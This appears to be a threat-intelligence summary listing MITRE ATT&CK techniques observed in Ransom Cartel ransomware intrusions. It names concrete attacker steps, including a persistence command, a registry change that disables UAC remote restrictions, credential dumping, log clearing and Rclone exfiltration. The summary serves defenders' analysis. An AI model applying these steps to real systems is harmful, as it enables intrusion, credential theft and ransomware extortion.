Ransom Cartel Ransomware: A Possible Connection With REvil

MITRE Techniques

• [T1078] Valid Accounts – Uses legitimate VPN, RDP, Citrix or VNC credentials to maintain access to an environment. “Uses legitimate VPN, RDP, Citrix or VNC credentials to maintain access to an environment.”
• [T1133] External Remote Services – Uses legitimate VPN or Citrix credentials to maintain access to an environment. “Uses legitimate VPN or Citrix credentials to maintain access to an environment.”
• [T1072] Software Deployment Tools – Deploys PDQ Inventory Scanner tool. “Deploys PDQ Inventory Scanner tool.”
• [T1059.001] Command and Scripting Interpreter: PowerShell – Uses PowerShell to retrieve the malicious payload and download additional resources such as Mimikatz and Rclone. “Uses PowerShell to retrieve the malicious payload and download additional resources such as Mimikatz and Rclone.”
• [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Uses cmd.exe to execute commands. “Uses cmd.exe to execute commands.”
• [T1003.008] OS Credential Dumping: /etc/passwd and /etc/shadow – Attempts to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. “Attempts to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking.”
• [T1098] Account Manipulation – Creates new users’ accounts; Adds newly created accounts to the administrators group to maintain elevated access. “Creates new users’ accounts.” “Adds newly created accounts to the administrators group to maintain elevated access.”
• [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Adds registry run keys to achieve persistence. “Adds registry run keys to achieve persistence. In some cases, we observed using the following command: start cmd.exe /k runonce.exe /AlternateShellStartup.”
• [T1197] BITS Jobs – Uses BITSAdmin to download and install payloads. “Uses BITSAdmin to download and install payloads.”
• [T1068] Exploitation for Privilege Escalation – Exploits Print Nightmare vulnerability. “Exploits Print Nightmare vulnerability.”
• [T1222.002] File and Directory Permissions Modification: Linux and Mac – Uses the chmod +x command to grant executable permissions to the ransomware. “Uses the chmod +x command to grant executable permissions to the ransomware.”
• [T1112] Modify Registry – Modifies the Registry to disable UAC remote restrictions by setting SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystemLocalAccountTokenFilterPolicy to 1. “
• [T1070.001] Indicator Removal on Host: Clear Windows Event Logs – Uses wevtutil to clear the Windows event logs. “Uses wevtutil to clear the Windows event logs.”
• [T1218.011] System Binary Proxy Execution: Rundll32 – Uses Rundll32 to load and execute malicious DLL. “Uses Rundll32 to load and execute malicious DLL.”
• [T1562.004] Impair Defenses: Disable or Modify System Firewall – Deletes rules in the Windows Defender Firewall exception list related to AnyDesk. “Deletes rules in the Windows Defender Firewall exception list related to AnyDesk.”
• [T1070.004] Indicator Removal on Host: File Deletion – Deletes some of its files used during operations as part of cleanup, including removing applications such as 7z.exe, tor.exe, ssh.exe. “Deletes some of its files used during operations as part of cleanup, including removing applications such as 7z.exe, tor.exe, ssh.exe”
• [T1070.003] Indicator Removal on Host: Clear Command History – Clears Windows PowerShell and WitnessClientAdmin log file. “Clears Windows PowerShell and WitnessClientAdmin log file.”
• [T1027] Obfuscated Files or Information – Uses encoded PowerShell commands. “Uses encoded PowerShell commands.”
• [T1003.001] OS Credential Dumping: LSASS Memory – Uses Mimikatz to harvest credentials. “Uses Mimikatz to harvest credentials.”
• [T1555.003] Credentials from Web Browsers – Compromises users’ saved passwords from browsers. “Compromises users’ saved passwords from browsers.”
• [T1046] Network Service Discovery – Uses PDQ Inventory scanner, Advanced Port Scanner and netscan to discover services. “Uses PDQ Inventory scanner, Advanced Port Scanner and netscan (which also scanned for the ProxyShell vulnerability).”
• [T1083] File and Directory Discovery – Searches for specific files prior to encryption. “Searches for specific files prior to encryption.”
• [T1135] Network Share Discovery – Enumerates remote open SMB network shares. “Enumerates remote open SMB network shares.”
• [T1087.001] Account Discovery: Local Account – Accesses ntuser.dat and /etc/passwd to enumerate all accounts. “Accesses ntuser.dat and /etc/passwd to enumerate all accounts.”
• [T1021.004] Remote Services: SSH – Uses Putty for remote access. “Uses Putty for remote access.”
• [T1550.002] Use Alternate Authentication Material: Pass the Hash – Dumps password hashes for use in pass the hash authentication attacks. “Dumps password hashes for use in pass the hash authentication attacks.”
• [T1021.001] Remote Services: Remote Desktop Protocol – Uses RDP for lateral movement. “Uses RDP for lateral movement.”
• [T1560.001] Archive Collected Data: Archive via Utility – Uses 7-Zip to compress stolen data for exfiltration. “Uses 7-Zip to compress stolen data for exfiltration.”
• [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage – Uses Rclone to exfiltrate data to cloud sharing websites (such as PCloud and MegaSync). “Uses Rclone to exfiltrate data to cloud sharing websites (such as PCloud and MegaSync).”
• [T1219] Remote Access Software – Uses AnyDesk to remotely connect and transfer files. “Uses AnyDesk to remotely connect and transfer files.”
• [T1090.003] Proxy: Multi-hop Proxy – Routes traffic over TOR and VPN servers to obfuscate their activities. “Routes traffic over TOR and VPN servers to obfuscate their activities.”
• [T1105] Ingress Tool Transfer – Downloads and uploads files to and from the victim’s machine. “Downloads and uploads files to and from the victim’s machine.”
• [T1486] Data Encrypted for Impact – Encrypts system data and adds the random extension to encrypted files. “Encrypts system data and adds the random extension to encrypted files. The following extensions have been observed ( .zmi5z, .nwixz, .ext, .zje2m, .5vm8t, .m4tzt ).”